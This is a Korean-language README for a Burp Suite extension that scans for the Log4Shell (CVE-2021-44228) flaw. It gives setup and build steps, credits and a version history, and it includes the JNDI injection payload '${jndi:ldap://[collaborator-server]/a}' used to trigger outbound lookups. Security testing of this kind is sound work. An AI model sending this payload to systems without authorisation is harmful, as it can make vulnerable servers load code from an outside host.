
인증 전후 Log4Shell(CVE-2021-44228) 취약점을 스캔하는 Burp 확장 프로그램
저는 여러분의 행동, Burp Suite의 멈춤, 대상 시스템의 해킹, 또는 여러분이 이 안내를 따라 발생한 현재의 경제 위기에 대해 책임지지 않습니다. 여러분은 이 도구를 사용하기로 선택한 것이며, 만약 무언가 망가뜨린 것에 대해 저에게 책임을 돌린다면 저는 그냥 웃을 것입니다.

스캔 구성 > 라이브러리에서 선택을 선택합니다.감사 검사 - 확장 프로그램만을 선택하고 확인 버튼을 누릅니다.Silent Signal님께 특별히 감사드리며, 지침과 스캔 구성은 그의 확장 프로그램에서 영감을 받았습니다.
[collaborator-server]를 자리 표시자로 추가하세요.[collaborator-server는 협력자 서버 URL로 자동 대체됩니다."${jndi:ldap://[collaborator-server]/a}https://github.com/0xDexter0us/Log4J-Scanner/releases/
./gradlew build fatJarbuild/libs/Log4J-Scanner-x.x.x.jarhttps://github.com/f0ng/log4j2burpscannerhttps://github.com/albinowax/ActiveScanPlusPlus & https://github.com/silentsignal/burp-log4shell2021년 12월 25일 - v0.2.0
2021년 12월 13일 - v0.1.0